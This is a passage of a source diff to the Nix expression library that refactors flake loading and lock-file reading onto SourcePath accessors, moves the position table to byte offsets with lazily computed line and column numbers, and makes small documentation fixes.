buffer.append("\0\0", 2);
- auto s = make_ref<std::string>(std::move(buffer));
- return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath("."), staticBaseEnv);
+ auto s = make_ref<std::string>(buffer);
+ return parse(buffer.data(), buffer.size(), Pos::Stdin{.source = s}, rootPath("."), staticBaseEnv);
}
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 01abd4eb1..368bb17b3 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -153,6 +153,7 @@ struct DebugTrace {
bool isError;
};
+
class EvalState : public std::enable_shared_from_this<EvalState>
{
public:
@@ -222,6 +223,7 @@ public:
*/
ReplExitStatus (* debugRepl)(ref<EvalState> es, const ValMap & extraEnv);
bool debugStop;
+ bool inDebugger = false;
int trylevel;
std::list<DebugTrace> debugTraces;
std::map<const Expr *, const std::shared_ptr<const StaticEnv>> exprEnvs;
diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc
index 022d39cdb..bca473453 100644
--- a/src/libexpr/flake/flake.cc
+++ b/src/libexpr/flake/flake.cc
@@ -139,7 +139,7 @@ static FlakeInput parseFlakeInput(EvalState & state,
attrs.emplace(state.symbols[attr.name], Explicit<bool> { attr.value->boolean });
break;
case nInt:
- attrs.emplace(state.symbols[attr.name], (long unsigned int)attr.value->integer);
+ attrs.emplace(state.symbols[attr.name], (long unsigned int) attr.value->integer);
break;
default:
if (attr.name == state.symbols.create("publicKeys")) {
@@ -202,43 +202,27 @@ static std::map<FlakeId, FlakeInput> parseFlakeInputs(
return inputs;
}
-static Flake getFlake(
+static Flake readFlake(
EvalState & state,
const FlakeRef & originalRef,
- bool allowLookup,
- FlakeCache & flakeCache,
- InputPath lockRootPath)
+ const FlakeRef & resolvedRef,
+ const FlakeRef & lockedRef,
+ const SourcePath & rootDir,
+ const InputPath & lockRootPath)
{
- auto [storePath, resolvedRef, lockedRef] = fetchOrSubstituteTree(
- state, originalRef, allowLookup, flakeCache);
+ auto flakePath = rootDir / CanonPath(resolvedRef.subdir) / "flake.nix";
- // We need to guard against symlink attacks, but before we start doing
- // filesystem operations we should make sure there's a flake.nix in the
- // first place.
- auto unsafeFlakeDir = state.store->toRealPath(storePath) + "/" + lockedRef.subdir;
- auto unsafeFlakeFile = unsafeFlakeDir + "/flake.nix";
- if (!pathExists(unsafeFlakeFile))
- throw Error("source tree referenced by '%s' does not contain a '%s/flake.nix' file", lockedRef, lockedRef.subdir);
-
- // Guard against symlink attacks.
- auto flakeDir = canonPath(unsafeFlakeDir, true);
- auto flakeFile = canonPath(flakeDir + "/flake.nix", true);
- if (!isInDir(flakeFile, state.store->toRealPath(storePath)))
- throw Error("'flake.nix' file of flake '%s' escapes from '%s'",
- lockedRef, state.store->printStorePath(storePath));
+ // NOTE evalFile forces vInfo to be an attrset because mustBeTrivial is true.
+ Value vInfo;
+ state.evalFile(flakePath, vInfo, true);
Flake flake {
.originalRef = originalRef,
.resolvedRef = resolvedRef,
.lockedRef = lockedRef,
- .storePath = storePath,
+ .path = flakePath,
};
- Value vInfo;
- state.evalFile(state.rootPath(CanonPath(flakeFile)), vInfo, true); // FIXME: symlink attack
-
- expectType(state, nAttrs, vInfo, state.positions.add({state.rootPath(CanonPath(flakeFile))}, 1, 1));
-
if (auto description = vInfo.attrs->get(state.sDescription)) {
expectType(state, nString, *description->value, description->pos);
flake.description = description->value->c_str();
@@ -247,7 +231,7 @@ static Flake getFlake(
auto sInputs = state.symbols.create("inputs");
if (auto inputs = vInfo.attrs->get(sInputs))
- flake.inputs = parseFlakeInputs(state, inputs->value, inputs->pos, flakeDir, lockRootPath);
+ flake.inputs = parseFlakeInputs(state, inputs->value, inputs->pos, flakePath.parent().path.abs(), lockRootPath); // FIXME
auto sOutputs = state.symbols.create("outputs");
@@ -264,7 +248,7 @@ static Flake getFlake(
}
} else
- throw Error("flake '%s' lacks attribute 'outputs'", lockedRef);
+ throw Error("flake '%s' lacks attribute 'outputs'", resolvedRef);
auto sNixConfig = state.symbols.create("nixConfig");
@@ -281,7 +265,7 @@ static Flake getFlake(
NixStringContext emptyContext = {};
flake.config.settings.emplace(
state.symbols[setting.name],
- state.coerceToString(setting.pos, *setting.value, emptyContext, "", false, true, true) .toOwned());
+ state.coerceToString(setting.pos, *setting.value, emptyContext, "", false, true, true).toOwned());
}
else if (setting.value->type() == nInt)
flake.config.settings.emplace(
@@ -313,12 +297,25 @@ static Flake getFlake(
attr.name != sOutputs &&
attr.name != sNixConfig)
throw Error("flake '%s' has an unsupported attribute '%s', at %s",
- lockedRef, state.symbols[attr.name], state.positions[attr.pos]);
+ resolvedRef, state.symbols[attr.name], state.positions[attr.pos]);
}
return flake;
}
+static Flake getFlake(
+ EvalState & state,
+ const FlakeRef & originalRef,
+ bool allowLookup,
+ FlakeCache & flakeCache,
+ InputPath lockRootPath)
+{
+ auto [storePath, resolvedRef, lockedRef] = fetchOrSubstituteTree(
+ state, originalRef, allowLookup, flakeCache);
+
+ return readFlake(state, originalRef, resolvedRef, lockedRef, state.rootPath(state.store->toRealPath(storePath)), lockRootPath);
+}
+
Flake getFlake(EvalState & state, const FlakeRef & originalRef, bool allowLookup, FlakeCache & flakeCache)
{
return getFlake(state, originalRef, allowLookup, flakeCache, {});
@@ -330,6 +327,13 @@ Flake getFlake(EvalState & state, const FlakeRef & originalRef, bool allowLookup
return getFlake(state, originalRef, allowLookup, flakeCache);
}
+static LockFile readLockFile(const SourcePath & lockFilePath)
+{
+ return lockFilePath.pathExists()
+ ? LockFile(lockFilePath.readFile(), fmt("%s", lockFilePath))
+ : LockFile();
+}
+
/* Compute an in-memory lock file for the specified top-level flake,
and optionally write it to file, if the flake is writable. */
LockedFlake lockFlake(
@@ -355,17 +359,16 @@ LockedFlake lockFlake(
throw Error("reference lock file was provided, but the `allow-dirty` setting is set to false");
}
- // FIXME: symlink attack
- auto oldLockFile = LockFile::read(
+ auto oldLockFile = readLockFile(
lockFlags.referenceLockFilePath.value_or(
- state.store->toRealPath(flake.storePath) + "/" + flake.lockedRef.subdir + "/flake.lock"));
+ flake.lockFilePath()));
debug("old lock file: %s", oldLockFile);
std::map<InputPath, FlakeInput> overrides;
std::set<InputPath> explicitCliOverrides;
std::set<InputPath> overridesUsed, updatesUsed;
- std::map<ref<Node>, StorePath> nodePaths;
+ std::map<ref<Node>, SourcePath> nodePaths;
for (auto & i : lockFlags.inputOverrides) {
overrides.insert_or_assign(i.first, FlakeInput { .ref = i.second });
@@ -538,7 +541,7 @@ LockedFlake lockFlake(
if (mustRefetch) {
auto inputFlake = getFlake(state, oldLock->lockedRef, false, flakeCache, inputPath);
- nodePaths.emplace(childNode, inputFlake.storePath);
+ nodePaths.emplace(childNode, inputFlake.path.parent());
computeLocks(inputFlake.inputs, childNode, inputPath, oldLock, lockRootPath, parentPath, false);
} else {
computeLocks(fakeInputs, childNode, inputPath, oldLock, lockRootPath, parentPath, true);
@@ -587,13 +590,12 @@ LockedFlake lockFlake(
flake. Also, unless we already have this flake
in the top-level lock file, use this flake's
own lock file. */
- nodePaths.emplace(childNode, inputFlake.storePath);
+ nodePaths.emplace(childNode, inputFlake.path.parent());
computeLocks(
inputFlake.inputs, childNode, inputPath,
oldLock
? std::dynamic_pointer_cast<const Node>(oldLock)
- : LockFile::read(
- state.store->toRealPath(inputFlake.storePath) + "/" + inputFlake.lockedRef.subdir + "/flake.lock").root.get_ptr(),
+ : readLockFile(inputFlake.lockFilePath()).root.get_ptr(),
oldLock ? lockRootPath : inputPath,
localPath,
false);
@@ -605,7 +607,7 @@ LockedFlake lockFlake(
auto childNode = make_ref<LockedNode>(lockedRef, ref, false);
- nodePaths.emplace(childNode, storePath);
+ nodePaths.emplace(childNode, state.rootPath(state.store->toRealPath(storePath)));
node->inputs.insert_or_assign(id, childNode);
}
@@ -619,9 +621,9 @@ LockedFlake lockFlake(
};
// Bring in the current ref for relative path resolution if we have it
- auto parentPath = canonPath(state.store->toRealPath(flake.storePath) + "/" + flake.lockedRef.subdir, true);
+ auto parentPath = flake.path.parent().path.abs();
- nodePaths.emplace(newLockFile.root, flake.storePath);
+ nodePaths.emplace(newLockFile.root, flake.path.parent());
computeLocks(
flake.inputs,
@@ -746,13 +748,15 @@ void callFlake(EvalState & state,
auto overrides = state.buildBindings(lockedFlake.nodePaths.size());
- for (auto & [node, storePath] : lockedFlake.nodePaths) {
+ for (auto & [node, sourcePath] : lockedFlake.nodePaths) {
auto override = state.buildBindings(2);
auto & vSourceInfo = override.alloc(state.symbols.create("sourceInfo"));
auto lockedNode = node.dynamic_pointer_cast<const LockedNode>();
+ auto [storePath, subdir] = state.store->toStorePath(sourcePath.path.abs());
+
emitTreeAttrs(
state,
storePath,
@@ -766,7 +770,7 @@ void callFlake(EvalState & state,
override
.alloc(state.symbols.create("dir"))
- .mkString(lockedNode ? lockedNode->lockedRef.subdir : lockedFlake.flake.lockedRef.subdir);
+ .mkString(CanonPath(subdir).rel());
overrides.alloc(state.symbols.create(key->second)).mkAttrs(override);
}
@@ -921,18 +925,17 @@ static RegisterPrimOp r4({
}
-Fingerprint LockedFlake::getFingerprint() const
+std::optional<Fingerprint> LockedFlake::getFingerprint(ref<Store> store) const
{
+ if (lockFile.isUnlocked()) return std::nullopt;
+
+ auto fingerprint = flake.lockedRef.input.getFingerprint(store);
+ if (!fingerprint) return std::nullopt;
+
// FIXME: as an optimization, if the flake contains a lock file
// and we haven't changed it, then it's sufficient to use
// flake.sourceInfo.storePath for the fingerprint.
- return hashString(HashAlgorithm::SHA256,
- fmt("%s;%s;%d;%d;%s",
- flake.storePath.to_string(),
- flake.lockedRef.subdir,
- flake.lockedRef.input.getRevCount().value_or(0),
- flake.lockedRef.input.getLastModified().value_or(0),
- lockFile));
+ return hashString(HashAlgorithm::SHA256, fmt("%s;%s;%s", *fingerprint, flake.lockedRef.subdir, lockFile));
}
Flake::~Flake() { }
diff --git a/src/libexpr/flake/flake.hh b/src/libexpr/flake/flake.hh
index 19b680c56..1ba085f0f 100644
--- a/src/libexpr/flake/flake.hh
+++ b/src/libexpr/flake/flake.hh
@@ -77,18 +77,27 @@ struct Flake
* the specific local store result of invoking the fetcher
*/
FlakeRef lockedRef;
+ /**
+ * The path of `flake.nix`.
+ */
+ SourcePath path;
/**
* pretend that 'lockedRef' is dirty
*/
bool forceDirty = false;
std::optional<std::string> description;
- StorePath storePath;
FlakeInputs inputs;
/**
* 'nixConfig' attribute
*/
ConfigFile config;
+
~Flake();
+
+ SourcePath lockFilePath()
+ {
+ return path.parent() / "flake.lock";
+ }
};
Flake getFlake(EvalState & state, const FlakeRef & flakeRef, bool allowLookup);
@@ -104,13 +113,13 @@ struct LockedFlake
LockFile lockFile;
/**
- * Store paths of nodes that have been fetched in
+ * Source tree accessors for nodes that have been fetched in
* lockFlake(); in particular, the root node and the overriden
* inputs.
*/
- std::map<ref<Node>, StorePath> nodePaths;
+ std::map<ref<Node>, SourcePath> nodePaths;
- Fingerprint getFingerprint() const;
+ std::optional<Fingerprint> getFingerprint(ref<Store> store) const;
};
struct LockFlags
@@ -165,7 +174,7 @@ struct LockFlags
/**
* The path to a lock file to read instead of the `flake.lock` file in the top-level flake
*/
- std::optional<Path> referenceLockFilePath;
+ std::optional<SourcePath> referenceLockFilePath;
/**
* The path to a lock file to write to instead of the `flake.lock` file in the top-level flake
diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc
index 86a0982f3..6e4aad64d 100644
--- a/src/libexpr/flake/flakeref.cc
+++ b/src/libexpr/flake/flakeref.cc
@@ -102,6 +102,19 @@ std::pair<FlakeRef, std::string> parsePathFlakeRefWithFragment(
if (isFlake) {
+ if (!S_ISDIR(lstat(path).st_mode)) {
+ if (baseNameOf(path) == "flake.nix") {
+ // Be gentle with people who accidentally write `/foo/bar/flake.nix` instead of `/foo/bar`
+ warn(
+ "Path '%s' should point at the directory containing the 'flake.nix' file, not the file itself. "
+ "Pretending that you meant '%s'"
+ , path, dirOf(path));
+ path = dirOf(path);
+ } else {
+ throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
+ }
+ }
+
if (!allowMissing && !pathExists(path + "/flake.nix")){
notice("path '%s' does not contain a 'flake.nix', searching up",path);
@@ -124,9 +137,6 @@ std::pair parsePathFlakeRefWithFragment(
throw BadURL("could not find a flake.nix file");
}
- if (!S_ISDIR(lstat(path).st_mode))
- throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
-
if (!allowMissing && !pathExists(path + "/flake.nix"))
throw BadURL("path '%s' is not a flake (because it doesn't contain a 'flake.nix' file)", path);
@@ -274,7 +284,7 @@ FlakeRef FlakeRef::fromAttrs(const fetchers::Attrs & attrs)
std::pair<StorePath, FlakeRef> FlakeRef::fetchTree(ref<Store> store) const
{
- auto [storePath, lockedInput] = input.fetch(store);
+ auto [storePath, lockedInput] = input.fetchToStore(store);
return {std::move(storePath), FlakeRef(std::move(lockedInput), subdir)};
}
diff --git a/src/libexpr/flake/lockfile.cc b/src/libexpr/flake/lockfile.cc
index e3a28c7c6..d252214dd 100644
--- a/src/libexpr/flake/lockfile.cc
+++ b/src/libexpr/flake/lockfile.cc
@@ -84,8 +84,10 @@ std::shared_ptr<Node> LockFile::findInput(const InputPath & path)
return doFind(root, path, visited);
}
-LockFile::LockFile(const nlohmann::json & json, const Path & path)
+LockFile::LockFile(std::string_view contents, std::string_view path)
{
+ auto json = nlohmann::json::parse(contents);
+
auto version = json.value("version", 0);
if (version < 5 || version > 7)
throw Error("lock file '%s' has unsupported version %d", path, version);
@@ -203,12 +205,6 @@ std::pair<std::string, LockFile::KeyMap> LockFile::to_string() const
return {json.dump(2), std::move(nodeKeys)};
}
-LockFile LockFile::read(const Path & path)
-{
- if (!pathExists(path)) return LockFile();
- return LockFile(nlohmann::json::parse(readFile(path)), path);
-}
-
std::ostream & operator <<(std::ostream & stream, const LockFile & lockFile)
{
stream << lockFile.toJSON().first.dump(2);
diff --git a/src/libexpr/flake/lockfile.hh b/src/libexpr/flake/lockfile.hh
index 57a7202a2..7e62e6d09 100644
--- a/src/libexpr/flake/lockfile.hh
+++ b/src/libexpr/flake/lockfile.hh
@@ -55,7 +55,7 @@ struct LockFile
ref<Node> root = make_ref<Node>();
LockFile() {};
- LockFile(const nlohmann::json & json, const Path & path);
+ LockFile(std::string_view contents, std::string_view path);
typedef std::map<ref<const Node>, std::string> KeyMap;
@@ -63,8 +63,6 @@ struct LockFile
std::pair<std::string, KeyMap> to_string() const;
- static LockFile read(const Path & path);
-
/**
* Check whether this lock file has any unlocked inputs. If so,
* return one.
diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l
index 5b26d6927..ee2b6b807 100644
--- a/src/libexpr/lexer.l
+++ b/src/libexpr/lexer.l
@@ -33,33 +33,16 @@ namespace nix {
static void initLoc(YYLTYPE * loc)
{
- loc->first_line = loc->last_line = 1;
- loc->first_column = loc->last_column = 1;
+ loc->first_line = loc->last_line = 0;
+ loc->first_column = loc->last_column = 0;
}
static void adjustLoc(YYLTYPE * loc, const char * s, size_t len)
{
loc->stash();
- loc->first_line = loc->last_line;
loc->first_column = loc->last_column;
-
- for (size_t i = 0; i < len; i++) {
- switch (*s++) {
- case '\r':
- if (*s == '\n') { /* cr/lf */
- i++;
- s++;
- }
- /* fall through */
- case '\n':
- ++loc->last_line;
- loc->last_column = 1;
- break;
- default:
- ++loc->last_column;
- }
- }
+ loc->last_column += len;
}
diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc
index 4b805d710..5bdc466eb 100644
--- a/src/libexpr/nixexpr.cc
+++ b/src/libexpr/nixexpr.cc
@@ -149,7 +149,10 @@ void ExprLambda::show(const SymbolTable & symbols, std::ostream & str) const
if (hasFormals()) {
str << "{ ";
bool first = true;
- for (auto & i : formals->formals) {
+ // the natural Symbol ordering is by creation time, which can lead to the
+ // same expression being printed in two different ways depending on its
+ // context. always use lexicographic ordering to avoid this.
+ for (auto & i : formals->lexicographicOrder(symbols)) {
if (first) first = false; else str << ", ";
str << symbols[i.name];
if (i.def) {
@@ -580,6 +583,39 @@ std::string ExprLambda::showNamePos(const EvalState & state) const
+/* Position table. */
+
+Pos PosTable::operator[](PosIdx p) const
+{
+ auto origin = resolve(p);
+ if (!origin)
+ return {};
+
+ const auto offset = origin->offsetOf(p);
+
+ Pos result{0, 0, origin->origin};
+ auto lines = this->lines.lock();
+ auto linesForInput = (*lines)[origin->offset];
+
+ if (linesForInput.empty()) {
+ auto source = result.getSource().value_or("");
+ const char * begin = source.data();
+ for (Pos::LinesIterator it(source), end; it != end; it++)
+ linesForInput.push_back(it->data() - begin);
+ if (linesForInput.empty())
+ linesForInput.push_back(0);
+ }
+ // as above: the first line starts at byte 0 and is always present
+ auto lineStartOffset = std::prev(
+ std::upper_bound(linesForInput.begin(), linesForInput.end(), offset));
+
+ result.line = 1 + (lineStartOffset - linesForInput.begin());
+ result.column = 1 + (offset - *lineStartOffset);
+ return result;
+}
+
+
+
/* Symbol table. */
size_t SymbolTable::totalSize() const
diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh
index 94356759b..e3cae8385 100644
--- a/src/libexpr/nixexpr.hh
+++ b/src/libexpr/nixexpr.hh
@@ -7,7 +7,6 @@
#include "value.hh"
#include "symbol-table.hh"
#include "error.hh"
-#include "chunked-vector.hh"
#include "position.hh"
#include "eval-error.hh"
#include "pos-idx.hh"
diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh
index 34aef661f..024e79c43 100644
--- a/src/libexpr/parser-state.hh
+++ b/src/libexpr/parser-state.hh
@@ -24,20 +24,15 @@ struct ParserLocation
int last_line, last_column;
// backup to recover from yyless(0)
- int stashed_first_line, stashed_first_column;
- int stashed_last_line, stashed_last_column;
+ int stashed_first_column, stashed_last_column;
void stash() {
- stashed_first_line = first_line;
stashed_first_column = first_column;
- stashed_last_line = last_line;
stashed_last_column = last_column;
}
void unstash() {
- first_line = stashed_first_line;
first_column = stashed_first_column;
- last_line = stashed_last_line;
last_column = stashed_last_column;
}
};
@@ -276,7 +271,7 @@ inline Expr * ParserState::stripIndentation(const PosIdx pos,
inline PosIdx ParserState::at(const ParserLocation & loc)
{
- return positions.add(origin, loc.first_line, loc.first_column);
+ return positions.add(origin, loc.first_column);
}
}
diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y
index b0aee7b41..bff066170 100644
--- a/src/libexpr/parser.y
+++ b/src/libexpr/parser.y
@@ -64,6 +64,10 @@ using namespace nix;
void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * error)
{
+ if (std::string_view(error).starts_with("syntax error, unexpected end of file")) {
+ loc->first_column = loc->last_column;
+ loc->first_line = loc->last_line;
+ }
throw ParseError({
.msg = HintFmt(error),
.pos = state->positions[state->at(*loc)]
@@ -87,6 +91,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char *
nix::StringToken uri;
nix::StringToken str;
std::vector<nix::AttrName> * attrNames;
+ std::vector<std::pair<nix::AttrName, nix::PosIdx>> * inheritAttrs;
std::vector<std::pair<nix::PosIdx, nix::Expr *>> * string_parts;
std::vector<std::pair<nix::PosIdx, std::variant<nix::Expr *, nix::StringToken>>> * ind_string_parts;
}
@@ -97,7 +102,8 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char *
%type <attrs> binds
%type <formals> formals
%type <formal> formal
-%type <attrNames> attrs attrpath
+%type <attrNames> attrpath
+%type <inheritAttrs> attrs
%type <string_parts> string_parts_interpolated
%type <ind_string_parts> ind_string_parts
%type <e> path_start string_parts string_attr
@@ -309,13 +315,12 @@ binds
: binds attrpath '=' expr ';' { $$ = $1; state->addAttr($$, std::move(*$2), $4, state->at(@2)); delete $2; }
| binds INHERIT attrs ';'
{ $$ = $1;
- for (auto & i : *$3) {
+ for (auto & [i, iPos] : *$3) {
if ($$->attrs.find(i.symbol) != $$->attrs.end())
- state->dupAttr(i.symbol, state->at(@3), $$->attrs[i.symbol].pos);
- auto pos = state->at(@3);
+ state->dupAttr(i.symbol, iPos, $$->attrs[i.symbol].pos);
$$->attrs.emplace(
i.symbol,
- ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, ExprAttrs::AttrDef::Kind::Inherited));
+ ExprAttrs::AttrDef(new ExprVar(iPos, i.symbol), iPos, ExprAttrs::AttrDef::Kind::Inherited));
}
delete $3;
}
@@ -325,14 +330,14 @@ binds
$$->inheritFromExprs = std::make_unique<std::vector<Expr *>>();
$$->inheritFromExprs->push_back($4);
auto from = new nix::ExprInheritFrom(state->at(@4), $$->inheritFromExprs->size() - 1);
- for (auto & i : *$6) {
+ for (auto & [i, iPos] : *$6) {
if ($$->attrs.find(i.symbol) != $$->attrs.end())
- state->dupAttr(i.symbol, state->at(@6), $$->attrs[i.symbol].pos);
+ state->dupAttr(i.symbol, iPos, $$->attrs[i.symbol].pos);
$$->attrs.emplace(
i.symbol,
ExprAttrs::AttrDef(
- new ExprSelect(CUR_POS, from, i.symbol),
- state->at(@6),
+ new ExprSelect(iPos, from, i.symbol),
+ iPos,
ExprAttrs::AttrDef::Kind::InheritedFrom));
}
delete $6;
@@ -341,12 +346,12 @@ binds
;
attrs
- : attrs attr { $$ = $1; $1->push_back(AttrName(state->symbols.create($2))); }
+ : attrs attr { $$ = $1; $1->emplace_back(AttrName(state->symbols.create($2)), state->at(@2)); }
| attrs string_attr
{ $$ = $1;
ExprString * str = dynamic_cast<ExprString *>($2);
if (str) {
- $$->push_back(AttrName(state->symbols.create(str->s)));
+ $$->emplace_back(AttrName(state->symbols.create(str->s)), state->at(@2));
delete str;
} else
throw ParseError({
@@ -354,7 +359,7 @@ attrs
.pos = state->positions[state->at(@2)]
});
}
- | { $$ = new AttrPath; }
+ | { $$ = new std::vector>; }
;
attrpath
@@ -433,7 +438,7 @@ Expr * parseExprFromBuf(
.symbols = symbols,
.positions = positions,
.basePath = basePath,
- .origin = {origin},
+ .origin = positions.addOrigin(origin, length),
.rootFS = rootFS,
.s = astSymbols,
};
diff --git a/src/libexpr/pos-idx.hh b/src/libexpr/pos-idx.hh
index 9949f1dc5..e94fd85c6 100644
--- a/src/libexpr/pos-idx.hh
+++ b/src/libexpr/pos-idx.hh
@@ -6,6 +6,7 @@ namespace nix {
class PosIdx
{
+ friend struct LazyPosAcessors;
friend class PosTable;
private:
diff --git a/src/libexpr/pos-table.hh b/src/libexpr/pos-table.hh
index 1decf3c85..8a0a3ba86 100644
--- a/src/libexpr/pos-table.hh
+++ b/src/libexpr/pos-table.hh
@@ -7,6 +7,7 @@
#include "chunked-vector.hh"
#include "pos-idx.hh"
#include "position.hh"
+#include "sync.hh"
namespace nix {
@@ -17,66 +18,69 @@ public:
{
friend PosTable;
private:
- // must always be invalid by default, add() replaces this with the actual value.
- // subsequent add() calls use this index as a token to quickly check whether the
- // current origins.back() can be reused or not.
- mutable uint32_t idx = std::numeric_limits<uint32_t>::max();
+ uint32_t offset;
- // Used for searching in PosTable::[].
- explicit Origin(uint32_t idx)
- : idx(idx)
- , origin{std::monostate()}
- {
- }
+ Origin(Pos::Origin origin, uint32_t offset, size_t size):
+ offset(offset), origin(origin), size(size)
+ {}
public:
const Pos::Origin origin;
+ const size_t size;
- Origin(Pos::Origin origin)
- : origin(origin)
+ uint32_t offsetOf(PosIdx p) const
{
+ return p.id - 1 - offset;
}
};
- struct Offset
- {
- uint32_t line, column;
- };
-
private:
- std::vector origins;
- ChunkedVector offsets;
+ using Lines = std::vector<uint32_t>;
-public:
- PosTable()
- : offsets(1024)
- {
- origins.reserve(1024);
- }
+ std::map<uint32_t, Origin> origins;
+ mutable Sync<std::map<uint32_t, Lines>> lines;
- PosIdx add(const Origin & origin, uint32_t line, uint32_t column)
+ const Origin * resolve(PosIdx p) const
{
- const auto idx = offsets.add({line, column}).second;
- if (origins.empty() || origins.back().idx != origin.idx) {
- origin.idx = idx;
- origins.push_back(origin);
- }
- return PosIdx(idx + 1);
- }
+ if (p.id == 0)
+ return nullptr;
- Pos operator[](PosIdx p) const
- {
- if (p.id == 0 || p.id > offsets.size())
- return {};
const auto idx = p.id - 1;
/* we want the last key <= idx, so we'll take prev(first key > idx).
- this is guaranteed to never rewind origin.begin because the first
- key is always 0. */
- const auto pastOrigin = std::upper_bound(
- origins.begin(), origins.end(), Origin(idx), [](const auto & a, const auto & b) { return a.idx < b.idx; });
- const auto origin = *std::prev(pastOrigin);
- const auto offset = offsets[idx];
- return {offset.line, offset.column, origin.origin};
+ this is guaranteed to never rewind origin.begin because the first
+ key is always 0. */
+ const auto pastOrigin = origins.upper_bound(idx);
+ return &std::prev(pastOrigin)->second;
+ }
+
+public:
+ Origin addOrigin(Pos::Origin origin, size_t size)
+ {
+ uint32_t offset = 0;
+ if (auto it = origins.rbegin(); it != origins.rend())
+ offset = it->first + it->second.size;
+ // +1 because all PosIdx are offset by 1 to begin with, and
+ // another +1 to ensure that all origins can point to EOF, eg
+ // on (invalid) empty inputs.
+ if (2 + offset + size < offset)
+ return Origin{origin, offset, 0};
+ return origins.emplace(offset, Origin{origin, offset, size}).first->second;
+ }
+
+ PosIdx add(const Origin & origin, size_t offset)
+ {
+ if (offset > origin.size)
+ return PosIdx();
+ return PosIdx(1 + origin.offset + offset);
+ }
+
+ Pos operator[](PosIdx p) const;
+
+ Pos::Origin originOf(PosIdx p) const
+ {
+ if (auto o = resolve(p))
+ return o->origin;
+ return std::monostate{};
}
};
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 78f7f71ed..bc2a70496 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -1736,7 +1736,7 @@ static RegisterPrimOp primop_findFile(PrimOp {
- If the suffix is found inside that directory, then the entry is a match.
The combined absolute path of the directory (now downloaded if need be) and the suffix is returned.
- [Lookup path](@docroot@/language/constructs/lookup-path.md) expressions can be [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath):
+ [Lookup path](@docroot@/language/constructs/lookup-path.md) expressions are [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath):
```nix
@@ -2524,6 +2524,54 @@ static RegisterPrimOp primop_unsafeGetAttrPos(PrimOp {
.fun = prim_unsafeGetAttrPos,
});
+// access to exact position information (ie, line and column numbers) is deferred
+// due to the cost associated with calculating that information and how rarely
+// it is used in practice. this is achieved by creating thunks to otherwise
+// inaccessible primops that are not exposed as __op or under builtins to turn
+// the internal PosIdx back into a line and column number, respectively. exposing
+// these primops in any way would at best be not useful and at worst create wildly
+// nondeterministic eval results depending on parse order of files.
+//
+// in a simpler world this would instead be implemented as another kind of thunk,
+// but each type of thunk has an associated runtime cost in the current evaluator.
+// as with black holes this cost is too high to justify another thunk type to check
+// for in the very hot path that is forceValue.
+static struct LazyPosAcessors {
+ PrimOp primop_lineOfPos{
+ .arity = 1,
+ .fun = [] (EvalState & state, PosIdx pos, Value * * args, Value & v) {
+ v.mkInt(state.positions[PosIdx(args[0]->integer)].line);
+ }
+ };
+ PrimOp primop_columnOfPos{
+ .arity = 1,
+ .fun = [] (EvalState & state, PosIdx pos, Value * * args, Value & v) {
+ v.mkInt(state.positions[PosIdx(args[0]->integer)].column);
+ }
+ };
+
+ Value lineOfPos, columnOfPos;
+
+ LazyPosAcessors()
+ {
+ lineOfPos.mkPrimOp(&primop_lineOfPos);
+ columnOfPos.mkPrimOp(&primop_columnOfPos);
+ }
+
+ void operator()(EvalState & state, const PosIdx pos, Value & line, Value & column)
+ {
+ Value * posV = state.allocValue();
+ posV->mkInt(pos.id);
+ line.mkApp(&lineOfPos, posV);
+ column.mkApp(&columnOfPos, posV);
+ }
+} makeLazyPosAccessors;
+
+void makePositionThunks(EvalState & state, const PosIdx pos, Value & line, Value & column)
+{
+ makeLazyPosAccessors(state, pos, line, column);
+}
+
/* Dynamic version of the `?' operator. */
static void prim_hasAttr(EvalState & state, const PosIdx pos, Value * * args, Value & v)
{
@@ -4522,11 +4570,9 @@ void EvalState::createBaseEnv()
addConstant("__nixPath", v, {
.type = nList,
.doc = R"(
- List of search path entries used to resolve [lookup paths](@docroot@/language/constructs/lookup-path.md).
+ The value of the [`nix-path` configuration setting](@docroot@/command-ref/conf-file.md#conf-nix-path): a list of search path entries used to resolve [lookup paths](@docroot@/language/constructs/lookup-path.md).
- Lookup path expressions can be
- [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar)
- using this and
+ Lookup path expressions are [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and
[`builtins.findFile`](./builtins.html#builtins-findFile):
```nix
diff --git a/src/libexpr/primops.hh b/src/libexpr/primops.hh
index 45486608f..9f76975db 100644
--- a/src/libexpr/primops.hh
+++ b/src/libexpr/primops.hh
@@ -51,4 +51,6 @@ void prim_importNative(EvalState & state, const PosIdx pos, Value * * args, Valu
*/
void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v);
+void makePositionThunks(EvalState & state, const PosIdx pos, Value & line, Value & column);
+
}
diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc
index 1eec8b316..27a454b27 100644
--- a/src/libexpr/primops/context.cc
+++ b/src/libexpr/primops/context.cc
@@ -137,14 +137,14 @@ static RegisterPrimOp primop_addDrvOutputDependencies({
.name = "__addDrvOutputDependencies",
.args = {"s"},
.doc = R"(
- Create a copy of the given string where a single consant string context element is turned into a "derivation deep" string context element.
+ Create a copy of the given string where a single constant string context element is turned into a "derivation deep" string context element.
The store path that is the constant string context element should point to a valid derivation, and end in `.drv`.
